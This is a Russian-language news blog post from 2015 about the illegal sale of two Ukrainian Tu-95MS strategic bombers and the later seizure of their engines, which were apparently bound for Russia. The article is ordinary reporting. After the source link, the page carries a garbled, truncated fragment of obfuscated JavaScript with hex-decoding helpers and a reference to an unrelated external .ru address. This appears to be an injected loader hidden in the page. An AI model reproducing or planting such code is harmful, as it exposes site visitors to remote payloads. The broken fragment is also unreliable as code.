ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Как в Украине продавали двигатели для стратегических ядерных бомбардировщиков Ту-95МС

Posted by operkor на Ноябрь 6, 2015

29Генеральная прокуратура обнаружила в Днепродзержинске двигатели от двух стратегических бомбардировщиков ТУ-95 МС, которые во времена Януковича Минобороны незаконно продало частным структурам. По данным следствия, коммерсанты намеревались их перепродать в Россию, где двигателям уже подыскали применение: установку на военные самолеты Военно-воздушных сил РФ.

Об этом стало известно из определения Печерского суда Киева от 23 октября 2015 года, размещенного в Едином реестре судебных решений. Этим решением суд отклонил ходатайство о снятие ареста с двигателей, поданное нынешним владельцем имущества – компанией «Днипробизнесбуд».

При этом в судебных документах уточняется, что «четыре двигателя типа НК-12 МВ были демонтированы со стратегических бомбардировщиков ТУ-95 МС в городе Николаев и перемещены в Днепродзержинск с целью их дальнейшей продажи и незаконного вывоза в Российскую Федерацию. Кроме того, получены сведения, что указанные двигатели предназначались для установки на военные самолеты Военно-воздушных сил Российской Федерации».

Как уже писала «Первая инстанция», ГПУ ведет расследование по факту незаконного отчуждения имущества Министерства обороны – двух самолетов ТУ-95МС 1987 года выпуска (заводские номера +100211732386 и 1000212733144). Они были проданы летом 2013 года.

В материалах уголовного производства указана предыстория этой сделки. Так, 23 мая 1992 года Украина подписала «Лиссабонский протокол» к Договору между СССР и США о сокращении и ограничении стратегических наступательных вооружений, взяв на себя соответствующие обязательства.

В следующем году между Украиной и США было заключено Соглашение о помощи в ликвидации стратегического ядерного оружия, а также предотвращения распространения оружия массового уничтожения. Позже президент Леонид Кучма утвердил Комплексную программу поэтапного сокращения и ликвидации стратегических авиакомплексов Ту-95МС и Ту-160. Предусматривалась утилизация и ликвидация самолетов типа ТУ-95МС как стратегических авиационных комплексов, предназначенных для применения ядерного оружия.

После распада СССР в Украине оставалось 23 стратегический ядерных бомбардировщика Ту-95МС. В конце 90-х в Киеве приняли решение о передаче Российской Федерации восьми самолетов Ту-160, три Ту-95МС и 581 крылатой ракеты Х-55 в счет уплаты долга за газ на сумму $ 285 млн. Оставшиеся два ракетоносца Ту-95МС позже были переоборудованы в самолёты-разведчики и поставлены на хранение возле Николаевского авиаремонтного предприятия. По одному Ту-160 и Ту-95МС в качестве музейных экспонатов остались в Полтавском музее дальней и стратегической авиации.

В то же время, предполагалось переоборудование двух стратегических бомбардировщиков ТУ-95МС стоимостью более 65 млн гривен из тяжелых бомбардировщиков в самолеты-разведчики.

Минобороны было необходимо разработать конструкторскую и технологическую документацию и осуществить переоборудование за счет госбюджета (в 2001 — 2003 годах предполагалось на эти цели выделить 1,6 млн. долларов).

Впоследствии бомбардировщики были направлены в госпредприятия «Николаевский авиаремонтный завод «НАРП» для переоборудования в разведывательные самолеты «экологический патруль», с помощью которых планировалось осуществление контроля радиационного и химического состояния воздуха на территории Украины.

Однако, Министерство обороны времен Януковича безосновательно включило их в перечень военного имущества, подлежащего отчуждению (в июле 2011 года). Кабмин одобрил этот перечень, соответствующее распоряжение было подписано главой правительства Николаем Азаровым.

В результате самолеты ТУ-95МС были проданы в июне 2013 года компании «Авто-Трейд Украина» по заниженной цене – 4,1 млн. гривен. В результате было недополучено 6,9 млн гривен, указано в материалах следствия.

Как следует из текста судебного документа, на сегодня установлено только местонахождение двигателей от этих самолетов, которые уже не принадлежат «Авто-Трейд Украина», а являются собственностью фирмы «Днипробизнесбуд».

Они были обнаружены в начале сентября в ходе осмотра складских помещений в Днепродзержинске.

Стоит отметить, что с 2007 года РФ после длительного перерыва возобновила воздушное патрулирования самолетами дальней авиации. Ту-95МС («Медведи», по классификации НАТО) остаются одними из главных составляющих воздушной части ядерной триады России.

Серийное производство стратегического авиационного комплекса Ту-95МС продолжалось с начала 1980-х до начала 1992 года. По данным российского сайта airwar.ru, в настоящее время в ВВС России имеется 28 самолетов Ту-95МС-6 и 35 Ту-95МС-16.

Напомним, в середине июля в Хабаровском крае РФ потерпел крушение стратегический бомбардировщик Ту-95МС. Семь Человек, который находились на борту, успели покинуть воздушное судно.

http://1i.com.ua

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "operkor.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//cs8gc1senu.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: